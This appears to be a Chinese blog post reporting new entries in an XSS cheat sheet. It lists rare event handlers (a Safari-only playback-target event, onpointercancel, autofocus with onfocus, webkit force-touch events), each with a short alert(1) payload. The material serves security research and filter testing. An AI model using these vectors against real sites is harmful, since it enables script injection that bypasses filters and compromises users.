XSS 攻击向量新发现:探索 onwebkitplaybacktargetavailabilitychanged 等罕见事件

本文介绍了XSS攻击向量中的新发现,包括Safari特有的onwebkitplaybacktargetavailabilitychanged事件、需要用户交互的onpointercancel事件以及autofocus属性的应用,展示了最新的Web安全研究进展。

onwebkitplaybacktargetavailabilitychanged?! XSS 攻击向量中的新奇特事件

我们的 XSS 攻击向量速查表 的强大之处在于我们获得了来自 Web 安全社区的出色贡献,这次更新也不例外。我们收到了来自 Mozilla 的宝贵贡献,删除了在 Firefox 中不再与 marquee 标签配合使用的事件。

有一个非常晦涩的仅适用于 Safari 的向量,使用了来自 @amirmsafarionwebkitplaybacktargetavailabilitychanged 事件,该事件适用于 audio 和 video 标签:

1

<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>

我们收到了来自 @Wcraft-log 的提交,涉及 onpointercancel 事件,该事件需要大量用户交互:

1

<xss onpointercancel=alert(1)>XSS</xss>

@Filipnyquist 指出我们没有记录几乎所有元素现在都可以使用 autofocus 属性。这一点之前由 @RenwaX23@lbherrera_ 发现。

1

<xss onfocus=alert(1) autofocus tabindex=1>XSS</xss>

最后,我们收到了来自 @zhenwarx 的提交,显示我们遗漏了一堆需要用户与触控板交互的 webkit 事件。

1
2
3
4

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>

注意:如果您想知道我们用什么来生成代码片段图像,我们使用了优秀的在线工具 Ray.so

相关研究

  • Repeater Strike: 手动测试,放大版
    2025年7月15日
    Repeater Strike: manual testing, amplified

  • 拖拽与攻陷:利用 ASCII 字符攻击 VS Code
    2025年4月30日
    Drag and Pwnd: Leverage ASCII characters to exploit VS Code

  • 记录我的渗透测试:你攻击,AI 写报告!
    2025年4月23日
    Document My Pentest: you hack, the AI writes it up!

  • SAML 轮盘赌:攻击者总是赢
    2025年3月18日
    SAML roulette: the hacker always wins

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次